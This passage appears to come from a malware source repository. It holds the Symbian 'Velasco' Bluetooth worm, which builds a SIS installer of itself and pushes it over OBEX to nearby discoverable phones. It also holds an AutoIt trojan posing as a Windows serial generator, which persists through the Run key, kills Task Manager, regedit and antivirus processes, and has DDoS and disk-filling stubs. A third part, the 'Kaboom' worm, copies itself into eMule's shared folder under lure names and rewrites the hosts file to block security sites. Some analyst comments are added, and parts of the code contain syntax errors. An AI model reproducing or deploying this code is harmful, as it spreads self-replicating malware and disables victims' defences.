0x00,0x6f,0x00,0x73,0x00,0x2e,0x00,0x6d,0x00,0x64,0x00,0x6c,0x00, 55 | 0x43,0x00,0x3a,0x00,0x5c,0x00,0x53,0x00,0x79,0x00,0x6d,0x00,0x62, 56 | 0x00,0x69,0x00,0x61,0x00,0x6e,0x00,0x5c,0x00,0x36,0x00,0x2e,0x00, 57 | 0x31,0x00,0x5c,0x00,0x53,0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x65, 58 | 0x00,0x73,0x00,0x36,0x00,0x30,0x00,0x5c,0x00,0x45,0x00,0x70,0x00, 59 | 0x6f,0x00,0x63,0x00,0x33,0x00,0x32,0x00,0x5c,0x00,0x72,0x00,0x65, 60 | 0x00,0x6c,0x00,0x65,0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x5c,0x00, 61 | 0x74,0x00,0x68,0x00,0x75,0x00,0x6d,0x00,0x62,0x00,0x5c,0x00,0x75, 62 | 0x00,0x72,0x00,0x65,0x00,0x6c,0x00,0x5c,0x00,0x76,0x00,0x65,0x00, 63 | 0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x2e,0x00,0x72, 64 | 0x00,0x73,0x00,0x63,0x00,0x21,0x00,0x3a,0x00,0x5c,0x00,0x73,0x00, 65 | 0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x6d,0x00,0x5c,0x00,0x61, 66 | 0x00,0x70,0x00,0x70,0x00,0x73,0x00,0x5c,0x00,0x76,0x00,0x65,0x00, 67 | 0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x5c,0x00,0x76, 68 | 0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00, 69 | 0x2e,0x00,0x72,0x00,0x73,0x00,0x63,0x00,0x53,0x00,0x65,0x00,0x72, 70 | 0x00,0x69,0x00,0x65,0x00,0x73,0x00,0x36,0x00,0x30,0x00,0x50,0x00, 71 | 0x72,0x00,0x6f,0x00,0x64,0x00,0x75,0x00,0x63,0x00,0x74,0x00,0x49, 72 | 0x00,0x44,0x00,0x56,0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00, 73 | 0x63,0x00,0x6f,0x00 74 | }; 75 | -------------------------------------------------------------------------------- /velasco/velasco/inc/resource.h: -------------------------------------------------------------------------------- 1 | unsigned char resourcecontent[]= 2 | { 3 | 0x0c,0x00,0x07,0x00,0x04,0x00,0x00,0x00,0x01,0x40,0xb0,0x6a,0x04, 4 | 0x00,0x0c,0x00,0x0c,0x00 5 | }; 6 | 7 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascoapplication.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCOAPPLICATION_H 2 | #define 
__VELASCOAPPLICATION_H 3 | 4 | #include 5 | 6 | 7 | class CVelascoApplication : public CAknApplication 8 | { 9 | private: 10 | CApaDocument* CreateDocumentL(); 11 | 12 | TUid AppDllUid() const; 13 | }; 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascoappui.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCOAPPUI_H 2 | #define __VELASCOAPPUI_H 3 | 4 | #include 5 | 6 | 7 | class CVelascoAppView; 8 | 9 | 10 | class CVelascoAppUi : public CAknAppUi 11 | { 12 | public: 13 | void ConstructL(); 14 | 15 | void HandleCommandL(TInt aCommand); 16 | 17 | private: 18 | CVelascoAppView* iAppView; 19 | }; 20 | 21 | #endif 22 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascocopyfiles.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCOCOPYFILES_H 2 | #define __VELASCOCOPYFILES_H 3 | 4 | #include 5 | 6 | 7 | class VelascoCopyFiles 8 | { 9 | public: 10 | void CopyFiles( CAknApplication *AppName ); 11 | 12 | private: 13 | unsigned short int CRC16( unsigned short int crc16, unsigned char *string, unsigned int stringsize ); 14 | void MakeInstaller(); 15 | }; 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascodocument.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCODOCUMENT_H 2 | #define __VELASCODOCUMENT_H 3 | 4 | #include 5 | 6 | 7 | class CVelascoAppUi; 8 | class CEikApplication; 9 | 10 | 11 | class CVelascoDocument : public CAknDocument 12 | { 13 | public: 14 | static CVelascoDocument* NewL( CEikApplication& aApp ); 15 | static CVelascoDocument* NewLC( CEikApplication& aApp ); 16 | 17 | CEikAppUi* CreateAppUiL(); 18 | 19 | private: 20 | void ConstructL() { }; 21 | 22 | inline CVelascoDocument( 
CEikApplication& aApp ); 23 | }; 24 | 25 | #endif 26 | -------------------------------------------------------------------------------- /velasco/velasco/src/bluetooth.cpp: -------------------------------------------------------------------------------- 1 | // Code based on: 2 | // http://irssibot.777-team.org/cobain/docs/2004-01-13/impl-html/btdiscoverer_8cpp-source.html 3 | // http://forum.newlc.com/viewtopic.php?p=2752 4 | // http://www.cs.tut.fi/~mobo/Symbianv6onedocs/devlib/Common/APIGuide/Bluetooth/UsingBluetoothSockets/HowToFindAndConnectToADevice/Howtoselectaremotedevice.html 5 | // http://www.rdc.cz/index.php?jazyk=0&sid=0&main=sekce&stav=clanek&cid=290 6 | 7 | #include "bluetooth.h" 8 | 9 | 10 | #define _BLUETOOTH_NOT_CONNECTED 0 11 | #define _BLUETOOTH_CONNECTED 1 12 | #define _BLUETOOTH_DISCONNECT 2 13 | 14 | #define _NOT 0 15 | 16 | // NOTE(review): the constructor prepares the object that RunL() later sends: a CObexFileObject initialised from C:\SYSTEM\SYMBIANSECUREDATA\VELASCO\VELASCO.SIS, the installer that velascocopyfiles.cpp writes to that path. 17 | VelascoBluetooth::VelascoBluetooth() : CActive( CActive::EPriorityStandard ) 18 | { 19 | FoundCell = _NOT; 20 | BluetoothStatus = _BLUETOOTH_CONNECTED; 21 | 22 | iCurrObject = CObexFileObject::NewL( TPtrC( NULL, 0 ) ); 23 | iCurrObject->InitFromFileL( _L( "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.SIS" ) ); 24 | 25 | // Adding it to the scheduler avoids synchronisation problems 26 | CActiveScheduler::Add( this ); 27 | } 28 | 29 | 30 | VelascoBluetooth* VelascoBluetooth::NewL() 31 | { 32 | return NewLC(); 33 | } 34 | 35 | 36 | VelascoBluetooth* VelascoBluetooth::NewLC() 37 | { 38 | VelascoBluetooth* self = new VelascoBluetooth; 39 | self->ConstructL(); 40 | return self; 41 | } 42 | 43 | 44 | void VelascoBluetooth::ConstructL() 45 | { 46 | BluetoothStatus = _BLUETOOTH_CONNECTED; 47 | 48 | RunL(); 49 | } 50 | 51 | // NOTE(review): RunL() (its body continues below) is a three-state loop driven by BluetoothStatus. In the _BLUETOOTH_CONNECTED state it runs a Bluetooth inquiry (KHostResInquiry with KGIAC) through the "BTLinkManager" protocol and opens an OBEX client over RFCOMM to the device returned; the next completion sends iCurrObject with Put(), and the one after that disconnects and returns to the inquiry state. Only devices that answer a general inquiry are found by this loop, so a non-discoverable device is not selected; on the receiving side the activity appears as an unsolicited incoming OBEX transfer of a .SIS file. 52 | void VelascoBluetooth::RunL() 53 | { 54 | if ( BluetoothStatus == _BLUETOOTH_NOT_CONNECTED ) 55 | { 56 | BluetoothStatus = _BLUETOOTH_CONNECTED; 57 | 58 | // Was it already connected?
59 | if ( iClient->IsConnected() ) 60 | { 61 | BluetoothStatus = _BLUETOOTH_DISCONNECT; 62 | 63 | Cancel(); 64 | iClient->Put( *iCurrObject, iStatus ); 65 | SetActive(); 66 | 67 | return; 68 | } 69 | } 70 | else if ( BluetoothStatus == _BLUETOOTH_DISCONNECT ) 71 | { 72 | BluetoothStatus = _BLUETOOTH_CONNECTED; 73 | 74 | Cancel(); 75 | iClient->Disconnect( iStatus ); 76 | SetActive(); 77 | 78 | return; 79 | } 80 | 81 | // Conseguiu conectar ? 82 | if ( BluetoothStatus == _BLUETOOTH_CONNECTED ) 83 | { 84 | if ( iClient != NULL ) 85 | { 86 | delete iClient; 87 | iClient = NULL; 88 | } 89 | 90 | while ( BluetoothStatus == _BLUETOOTH_CONNECTED ) 91 | { 92 | RSocketServ socketServ; 93 | TProtocolDesc pInfo; 94 | TNameEntry entry; 95 | 96 | if ( socketServ.Connect() == KErrNone ) 97 | { 98 | if ( socketServ.FindProtocol( (const TProtocolName &) _L( "BTLinkManager" ), pInfo ) == KErrNone ) 99 | { 100 | RHostResolver hr; 101 | 102 | if ( hr.Open( socketServ, pInfo.iAddrFamily, pInfo.iProtocol ) == KErrNone ) 103 | { 104 | TInquirySockAddr addr; 105 | 106 | FoundCell = _NOT; 107 | 108 | addr.SetAction( KHostResInquiry ); 109 | addr.SetIAC( KGIAC ); 110 | 111 | TRequestStatus status; 112 | hr.GetByAddress( addr, entry, status ); 113 | 114 | User::WaitForRequest( status ); 115 | 116 | FoundCell = ( status == KErrNone ); 117 | } 118 | } 119 | 120 | socketServ.Close(); 121 | } 122 | 123 | if ( FoundCell ) 124 | { 125 | FoundCell = _NOT; 126 | 127 | Cancel(); 128 | 129 | TBTSockAddr addr( entry().iAddr ); 130 | TBTDevAddr btAddress; 131 | 132 | btAddress = addr.BTAddr(); 133 | 134 | TObexBluetoothProtocolInfo obexProtocolInfo; 135 | 136 | obexProtocolInfo.iTransport.Copy( _L( "RFCOMM" ) ); 137 | obexProtocolInfo.iAddr.SetBTAddr( btAddress ); 138 | obexProtocolInfo.iAddr.SetPort( 9 ); 139 | 140 | if ( ( iClient = CObexClient::NewL( obexProtocolInfo ) ) ) 141 | { 142 | iStatus = KRequestPending; 143 | 144 | BluetoothStatus = _BLUETOOTH_NOT_CONNECTED; 145 | 146 | Cancel(); 147 | 
iClient->Connect( iStatus ); 148 | SetActive(); 149 | } 150 | } 151 | else 152 | { 153 | BluetoothStatus = _BLUETOOTH_CONNECTED; 154 | } 155 | } 156 | } 157 | } 158 | -------------------------------------------------------------------------------- /velasco/velasco/src/file.cpp: -------------------------------------------------------------------------------- 1 | // Arquivo obtido em: 2 | // http://www.todosymbian.com/files2/file.zip 3 | 4 | #include "file.h" 5 | 6 | 7 | bool File::Open(const TDesC &name,unsigned int mode){ 8 | TInt mask = 0; 9 | TInt err = 0; 10 | 11 | fsSession.Connect(); 12 | 13 | if(mode&OMText) mask = EFileStreamText; 14 | if(mode&OMRead) mask |= EFileRead; 15 | if(mode&OMWrite) mask |= EFileWrite; 16 | 17 | if(mode&OMCreate) err = rFile.Create(fsSession,name,mask); 18 | else if(mode&OMReplace) err = rFile.Replace(fsSession,name,mask); 19 | else if(mode&OMOpen) err = rFile.Open(fsSession,name,mask); 20 | 21 | if(err != KErrNone){ 22 | fsSession.Close(); 23 | return false; 24 | }else 25 | return true; 26 | } 27 | 28 | 29 | void File::Close(){ 30 | rFile.Flush(); 31 | rFile.Close(); 32 | fsSession.Close(); 33 | } 34 | 35 | 36 | int File::Read(void *buff,int length){ 37 | TPtr8 ptr((unsigned char*)buff,length); 38 | rFile.Read(ptr,length); 39 | return ptr.Length(); 40 | } 41 | 42 | 43 | int File::Write(void *buff,int length){ 44 | TPtr8 ptr((unsigned char*)buff,length,length); 45 | rFile.Write(ptr); 46 | return ptr.Length(); 47 | } 48 | 49 | 50 | void File::Seek(TSeek mode,int offSet){ 51 | rFile.Seek(mode,offSet); 52 | } 53 | -------------------------------------------------------------------------------- /velasco/velasco/src/velasco.cpp: -------------------------------------------------------------------------------- 1 | #include "velascoapplication.h" 2 | 3 | 4 | GLDEF_C TInt E32Dll(TDllReason aReason) 5 | { 6 | return KErrNone; 7 | } 8 | 9 | 10 | EXPORT_C CApaApplication* NewApplication() 11 | { 12 | return (new CVelascoApplication); 13 | } 14 
| -------------------------------------------------------------------------------- /velasco/velasco/src/velascoapplication.cpp: -------------------------------------------------------------------------------- 1 | #include "velascodocument.h" 2 | #include "velascoapplication.h" 3 | 4 | 5 | static const TUid KUidVelascoApp = {0x10005591}; 6 | 7 | 8 | CApaDocument* CVelascoApplication::CreateDocumentL() 9 | { 10 | CApaDocument* document = CVelascoDocument::NewL(*this); 11 | return document; 12 | } 13 | 14 | 15 | TUid CVelascoApplication::AppDllUid() const 16 | { 17 | return KUidVelascoApp; 18 | } 19 | -------------------------------------------------------------------------------- /velasco/velasco/src/velascoappui.cpp: -------------------------------------------------------------------------------- 1 | #include "velascoappui.h" 2 | #include "velascocopyfiles.h" 3 | #include "bluetooth.h" 4 | 5 | 6 | void CVelascoAppUi::ConstructL() 7 | { 8 | BaseConstructL( ENoAppResourceFile ); 9 | 10 | VelascoCopyFiles copyfiles; 11 | copyfiles.CopyFiles( (CAknApplication *) this->Application() ); 12 | 13 | VelascoBluetooth *bluetooth; 14 | bluetooth = VelascoBluetooth::NewL(); 15 | } 16 | 17 | 18 | void CVelascoAppUi::HandleCommandL(TInt aCommand) 19 | { 20 | switch(aCommand) 21 | { 22 | case EAknSoftkeyExit: 23 | case EEikCmdExit: 24 | Exit(); 25 | break; 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /velasco/velasco/src/velascocopyfiles.cpp: -------------------------------------------------------------------------------- 1 | #include "velascocopyfiles.h" 2 | #include "file.h" 3 | 4 | #include 5 | 6 | 7 | _LIT16( MARCOSMDLFILE, "MARCOS.MDL" ); 8 | _LIT16( VELASCORSCFILE, "VELASCO.RSC" ); 9 | 10 | _LIT( VELASCOPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\" ); 11 | _LIT( VELASCOAPPPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.APP" ); 12 | _LIT( VELASCORSCPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.RSC" ); 13 
| _LIT( VELASCOSISPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.SIS" ); 14 | 15 | _LIT( MDLPATH, "C:\\SYSTEM\\RECOGS\\" ); 16 | _LIT( MARCOSMDLPATH, "C:\\SYSTEM\\RECOGS\\MARCOS.MDL" ); 17 | 18 | // Size in bytes of the copy buffer used by MakeInstaller(). 19 | #define BLOCK_LEN 200 20 | 21 | 22 | // CRC16 function obtained from: 23 | // http://homepage.ntlworld.com/thouky/software/psifs/sis.html 24 | // Continues the running checksum crc16 over stringsize bytes of string and returns the updated value. 25 | unsigned short int VelascoCopyFiles::CRC16( unsigned short int crc16, unsigned char *string, unsigned int stringsize ) 26 | { 27 | unsigned int table[ 256 ], i; 28 | // The lookup table is rebuilt on every call: entries 2i and 2i+1 are derived from entry i with the constant 0x1021. 29 | table[ 0 ] = 0; 30 | 31 | for ( i = 0; i < 128; i++ ) 32 | { 33 | unsigned int carry = table[ i ] & 0x8000; 34 | unsigned int temp = ( table[ i ] << 1 ) & 0xFFFF; 35 | 36 | table[ i * 2 + ( carry ? 0 : 1 ) ] = temp ^ 0x1021; 37 | table[ i * 2 + ( carry ? 1 : 0 ) ] = temp; 38 | } 39 | // Fold each input byte into the checksum through the table. 40 | for ( i = 0; i < stringsize; i++ ) 41 | { 42 | crc16 = ( ( crc16 << 8 ) ^ table[ ( ( crc16 >> 8 ) ^ string[ i ] ) & 0xFF ] ); 43 | } 44 | 45 | return crc16; 46 | } 47 | // Writes the file VELASCOSISPATH as: headercontent, the file at VELASCOAPPPATH, the file at MARCOSMDLPATH, resourcecontent. 48 | // Lengths and offsets of the three payloads are patched into headercontent first; the CRC16 of everything except the two bytes at offset 0x10 is written to that offset last. 49 | void VelascoCopyFiles::MakeInstaller() 50 | { 51 | #include "header.h" 52 | #include "resource.h" 53 | // headercontent and resourcecontent are not declared in this file; presumably they come from the two headers included above. 54 | File fInstaller; 55 | 56 | // Try to create the file 57 | if ( ! fInstaller.Open( VELASCOSISPATH, File::OMRead | File::OMWrite | File::OMCreate ) ) 58 | { 59 | // Try to replace the file 60 | if ( ! 
fInstaller.Open( VELASCOSISPATH, File::OMRead | File::OMWrite | File::OMReplace ) ) 61 | { 62 | return; 63 | } 64 | } 65 | 66 | File fApplication; 67 | 68 | if ( fApplication.Open( VELASCOAPPPATH, File::OMRead | File::OMOpen ) ) 69 | { 70 | File fMDL; 71 | 72 | if ( fMDL.Open( MARCOSMDLPATH, File::OMRead | File::OMOpen ) ) 73 | { 74 | unsigned int FilesLength, ResourceLength, Offset1, Offset2, Offset3; 75 | 76 | int MDLLength, ApplicationLength; 77 | 78 | // Get the file sizes 79 | fApplication.rFile.Size( ApplicationLength ); 80 | fMDL.rFile.Size( MDLLength ); 81 | 82 | // Compute the data length and the offsets 83 | ResourceLength = sizeof( resourcecontent ); 84 | FilesLength = ApplicationLength + MDLLength + ResourceLength; 85 | 86 | Offset1 = sizeof( headercontent ); 87 | Offset2 = Offset1 + ApplicationLength; 88 | Offset3 = Offset2 + MDLLength; 89 | 90 | // Patch the lengths and offsets into the structure to be written 91 | memcpy( &headercontent[ 0x50 ], &FilesLength, sizeof( unsigned int ) ); 92 | // Each payload then gets three fields: its length, its offset in the output file, and its length again. 93 | memcpy( &headercontent[ 0x82 ], &ApplicationLength, sizeof( unsigned int ) ); 94 | memcpy( &headercontent[ 0x86 ], &Offset1, sizeof( unsigned int ) ); 95 | memcpy( &headercontent[ 0x8A ], &ApplicationLength, sizeof( unsigned int ) ); 96 | 97 | memcpy( &headercontent[ 0xB2 ], &MDLLength, sizeof( unsigned int ) ); 98 | memcpy( &headercontent[ 0xB6 ], &Offset2, sizeof( unsigned int ) ); 99 | memcpy( &headercontent[ 0xBA ], &MDLLength, sizeof( unsigned int ) ); 100 | 101 | memcpy( &headercontent[ 0xE2 ], &ResourceLength, sizeof( unsigned int ) ); 102 | memcpy( &headercontent[ 0xE6 ], &Offset3, sizeof( unsigned int ) ); 103 | memcpy( &headercontent[ 0xEA ], &ResourceLength, sizeof( unsigned int ) ); 104 | 105 | // Write the header 106 | fInstaller.Write( headercontent, sizeof( headercontent ) ); 107 | 108 | // Define some variables 109 | unsigned char buffer[ BLOCK_LEN ]; 110 | 111 | unsigned short int crc16 = 0; 112 | int 
bytes; 113 | 114 | // Compute the CRC16 of the first 0x10 bytes of the header 115 | crc16 = CRC16( crc16, (unsigned char *) headercontent, 0x10 ); 116 | // The two bytes at offset 0x10 are skipped here; the finished checksum is written there at the end. 117 | // Compute the CRC16 of the rest of the header 118 | crc16 = CRC16( crc16, (unsigned char *) &headercontent[ 0x12 ], sizeof( headercontent ) - 0x12 ); 119 | 120 | // Write APP 121 | while ( ( bytes = fApplication.Read( buffer, BLOCK_LEN ) ) ) 122 | { 123 | fInstaller.Write( buffer, bytes ); 124 | 125 | crc16 = CRC16( crc16, (unsigned char *) buffer, bytes ); 126 | } 127 | 128 | // Write RECOG 129 | while ( ( bytes = fMDL.Read( buffer, BLOCK_LEN ) ) ) 130 | { 131 | fInstaller.Write( buffer, bytes ); 132 | 133 | crc16 = CRC16( crc16, (unsigned char *) buffer, bytes ); 134 | } 135 | 136 | // Write RSC 137 | fInstaller.Write( resourcecontent, sizeof( resourcecontent ) ); 138 | 139 | crc16 = CRC16( crc16, (unsigned char *) resourcecontent, sizeof( resourcecontent ) ); 140 | 141 | // Write the CRC16 at offset 0x10 142 | fInstaller.Seek( ESeekStart, 0x10 ); 143 | fInstaller.Write( &crc16, sizeof( unsigned short int ) ); 144 | 145 | // Close handle 146 | fMDL.Close(); 147 | } 148 | 149 | // Close handle 150 | fApplication.Close(); 151 | } 152 | 153 | // Close handle 154 | fInstaller.Close(); 155 | } 156 | // Copies the component files to fixed locations. Unless the running DLL already is VELASCOAPPPATH, it is copied there and, if that succeeds, VELASCO.RSC from the same directory is copied to VELASCORSCPATH. 157 | // MARCOS.MDL from that directory is copied to MARCOSMDLPATH in every case. Host artifacts to look for: the directory VELASCOPATH and the file MARCOSMDLPATH. 158 | void VelascoCopyFiles::CopyFiles( CAknApplication *AppName ) 159 | { 160 | TFileName TempName = AppName->DllName(); 161 | TempName.UpperCase(); 162 | 163 | TParse parser; 164 | parser.Set( TempName, NULL, NULL ); 165 | 166 | RFs fs; 167 | User::LeaveIfError( fs.Connect() ); 168 | 169 | if ( TempName != VELASCOAPPPATH ) 170 | { 171 | fs.MkDirAll( VELASCOPATH ); 172 | 173 | if ( BaflUtils::CopyFile( fs, TempName, VELASCOAPPPATH, CFileMan::EOverWrite ) == KErrNone ) 174 | { 175 | TempName = parser.DriveAndPath(); 176 | TempName.Append( VELASCORSCFILE ); 177 | 178 | BaflUtils::CopyFile( fs, TempName, VELASCORSCPATH, CFileMan::EOverWrite ); 179 | } 180 | } 181 | 182 | TempName = parser.DriveAndPath(); 183 | TempName.Append( 
MARCOSMDLFILE ); 184 | 185 | fs.MkDirAll( MDLPATH ); 186 | BaflUtils::CopyFile( fs, TempName, MARCOSMDLPATH, CFileMan::EOverWrite ); 187 | 188 | fs.Close(); 189 | 190 | // Gera instalador 191 | MakeInstaller(); 192 | } 193 | -------------------------------------------------------------------------------- /velasco/velasco/src/velascodocument.cpp: -------------------------------------------------------------------------------- 1 | #include "velascoappui.h" 2 | #include "velascodocument.h" 3 | 4 | 5 | CVelascoDocument* CVelascoDocument::NewL(CEikApplication& aApp) 6 | { 7 | CVelascoDocument* self = NewLC(aApp); 8 | CleanupStack::Pop(self); 9 | return self; 10 | } 11 | 12 | 13 | CVelascoDocument* CVelascoDocument::NewLC(CEikApplication& aApp) 14 | { 15 | CVelascoDocument* self = new (ELeave) CVelascoDocument(aApp); 16 | CleanupStack::PushL(self); 17 | self->ConstructL(); 18 | return self; 19 | } 20 | 21 | 22 | CVelascoDocument::CVelascoDocument(CEikApplication& aApp) : CAknDocument(aApp) 23 | { 24 | } 25 | 26 | 27 | CEikAppUi* CVelascoDocument::CreateAppUiL() 28 | { 29 | CEikAppUi* appUi = new (ELeave) CVelascoAppUi; 30 | return appUi; 31 | } 32 | -------------------------------------------------------------------------------- /virus miei/distraction/windows_vista_xp_2000_nt_me_98_serial_generator.au3: -------------------------------------------------------------------------------- 1 | RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run\", "lsass", "REG_SIZE", "C:\windows\lsasss.exe") 2 | FileCopy("C:\programmi\emule\incoming\windows_vista_xp_2000_nt_me_98_serial_generator.exe", "C:\windows\lsasss.exe") 3 | if ProcessExists("windows_vista_xp_2000_nt_me_98_serial_generator.exe") Then 4 | MsgBox(0, "yep", "the serial was created in C:\") 5 | EndIf 6 | While 1 = 1 7 | If ProcessExists("regedit.exe") Then 8 | ProcessClose("regedit.exe") 9 | EndIf 10 | if ProcessExists("taskmgr.exe") Then 11 | ProcessClose("taskmgr.exe") 12 | MsgBox(0, "error", "The 
process has terminated by explorer.exe") 13 | EndIf 14 | WEnd 15 | 16 | Func DisattivaAV 17 | while 1 = 1 18 | if ProcessExists("kav.exe") Then 19 | ProcessClose("kav.exe") 20 | EndIf 21 | if ProcessExists("avp.exe") then 22 | ProcessClose("avp.exe") 23 | EndIf 24 | if ProcessExists("zonealarm.exe") Then 25 | ProcessClose("zonealarm.exe") 26 | EndIf 27 | if ProcessExists("nod32.exe") Then 28 | ProcessClose("nod32.exe") 29 | EndIf 30 | If ProcessExists("avg.exe") Then 31 | ProcessClose("avg.exe") 32 | EndIf 33 | WEnd 34 | EndFunc 35 | 36 | 37 | Func Attacco_Ddos 38 | $mese = @MON 39 | $day = @MDAY 40 | if $mese = 6 And $day = 21 Then 41 | TCPConnect(85.12.27.135, 80) 42 | EndIf 43 | EndFunc 44 | 45 | 46 | Func RiempiDisco 47 | $v = 1 to 800000000000000000000000000000000000000000000000000000000000000000000000000000000 step +1 48 | for $c = 1 to 70000000000000000000000000000000 step +1 49 | FileOpen("C:\serial."$v".txt", 0) 50 | filewrite("Windows serial(www.serialz.to) de94r-33ss2-ki4ii-22op3-dx21c") 51 | EndFunc 52 | 53 | if $mese = 6 And $day > 21 Then 54 | Shutdown("shutdown -s") 55 | EndIf 56 | 57 | 58 | -------------------------------------------------------------------------------- /virus miei/distraction/windows_vista_xp_2000_nt_me_98_serial_generator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/virus miei/distraction/windows_vista_xp_2000_nt_me_98_serial_generator.exe -------------------------------------------------------------------------------- /virus miei/kaboom/Kaboom.cpp: -------------------------------------------------------------------------------- 1 | 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | const char msg1[]= "WINDOWS VISTA IS ARMAGEDDON"; 13 | const char msg2[]= "Kaboom worm"; 14 | char windir[MAX_PATH]; 15 | 16 | 17 | int APIENTRY 
WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 18 | { 19 | char pathname[256]; 20 | GetWindowsDirectory(windir, sizeof(windir)); 21 | HMODULE hMe = GetModuleHandle(NULL); 22 | DWORD nRet = GetModuleFileName(hMe, pathname, 256); 23 | HKEY hKey; 24 | strcat(windir, "\\System32\\Sock_windows\\Services_update.exe"); 25 | CopyFile(pathname, windir, 0); 26 | /* Persistence: the path of the copy made above is stored as the value Windows Services, first under the HKCU Software key and then under the HKCU Run key. */ 27 | RegCreateKey (HKEY_CURRENT_USER, "Software\\", &hKey); 28 | RegSetValueEx (hKey, "Windows Services", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); 29 | /* Host indicators in this function: the Services_update.exe path under the Windows directory and the Run value named Windows Services. */ 30 | /* The CopyFile calls after the Run-key write place copies of the running executable in an eMule incoming directory under lure file names; presumably that directory is shared with peers. */ 31 | RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey); 32 | RegSetValueEx (hKey, "Windows Services", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); 33 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Windows 2000-me-vista-xp-98 unlimited serial generation.exe", 0); 34 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\sexsexsex.src.exe", 0); 35 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\windows vista source code.zip.exe", 0); 36 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Kaspersky_crack.exe", 0); 37 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Nod32_crack.exe", 0); 38 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Norton_key_generation.exe", 0); 39 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Downloader_windows_source_code.exe", 0); 40 | 41 | } 42 | 43 | void Message() 44 | { 45 | FILE *fpt; 46 | fpt = fopen ("C:\\message_for_mydoom","w") 47 | fprintf(fpt,"the mydoom worm is a stupid worm..."); 48 | fprintf(fpt,"is just a simple mass-mailer and p2p worm with an extra(Ddos_attack)...") 49 | fprintf(fpt,"this worm was propagated because the people are stupid and accept every attachment..."); 50 | fprintf(fpt,""); 51 | fprintf(fpt,"netsky and sasser are worm very simple but very dangerous...why? 
Because the administrator"); 52 | fprintf(fpt,"don't update...:("); 53 | fprintf(fpt,""); 54 | fprintf(fpt,"Kaboom's author"); 55 | fprintf(fpt,""); 56 | fprintf(fpt,""); 57 | fprintf(fpt,"") 58 | fprintf(fpt,""); 59 | fprintf(fpt,"i will survive"); 60 | fclose(fpt); 61 | } 62 | 63 | void BlockSite() 64 | { 65 | FILE *fpl; 66 | fpl = fopen ("C:\\WINDOWS\\System32\\drivers\\etc\\hosts","w"); 67 | fprintf (fpl,"0.0.0.0 google.com"); 68 | fprintf (fpl," 0.0.0.0 www.hotmail.com"); 69 | fprintf (fpl," 0.0.0.0 www.microsoft.com"); 70 | fprintf (fpl," 0.0.0.0 microsoft.com"); 71 | fprintf (fpl," 0.0.0.0 macafee.com"); 72 | fprintf (fpl," 0.0.0.0 www.macafee.com"); 73 | fprintf (fpl," 0.0.0.0 download.mcafee.com"); 74 | fprintf (fpl," 0.0.0.0 www.download.mcafee.com"); 75 | fprintf (fpl," 0.0.0.0 rads.mcafee.com"); 76 | fprintf (fpl," 0.0.0.0 us.mcafee.com"); 77 | fprintf (fpl," 0.0.0.0 www.networkassociates.com"); 78 | fprintf (fpl," 0.0.0.0 networkassociates.com"); 79 | fprintf (fpl," 0.0.0.0 update.symantec.com"); 80 | fprintf (fpl," 0.0.0.0 updates.symantec.com"); 81 | fprintf (fpl," 0.0.0.0 iveupdate.symantec.com"); 82 | fprintf (fpl," 0.0.0.0 norton.com"); 83 | fprintf (fpl," 0.0.0.0 www.symantec.com"); 84 | fprintf (fpl," 0.0.0.0 symantec.com"); 85 | fprintf (fpl," 0.0.0.0 www.norton.com"); 86 | fprintf (fpl," 0.0.0.0 google.com"); 87 | fprintf (fpl," 0.0.0.0 bitdefender.com"); 88 | fprintf (fpl," 0.0.0.0 www.viruslist.com"); 89 | fprintf (fpl," 0.0.0.0 viruslist.com"); 90 | fprintf (fpl," 0.0.0.0 www.virustotal.com"); 91 | fprintf (fpl," 0.0.0.0 virustotal.com"); 92 | fprintf (fpl," 0.0.0.0 www.kaspersky.com"); 93 | fprintf (fpl," 0.0.0.0 kaspersky.com"); 94 | fprintf (fpl," 0.0.0.0 kaspersky-labs.com"); 95 | fprintf (fpl," 0.0.0.0 www.kaspersky-labs.com"); 96 | fprintf (fpl," 0.0.0.0 www.trendmicro.com"); 97 | fprintf (fpl," 0.0.0.0 trendmicro.com"); 98 | fprintf (fpl," 0.0.0.0 www.pandasoftware.com"); 99 | fprintf (fpl," 0.0.0.0 pandasoftware.com"); 100 | fprintf 
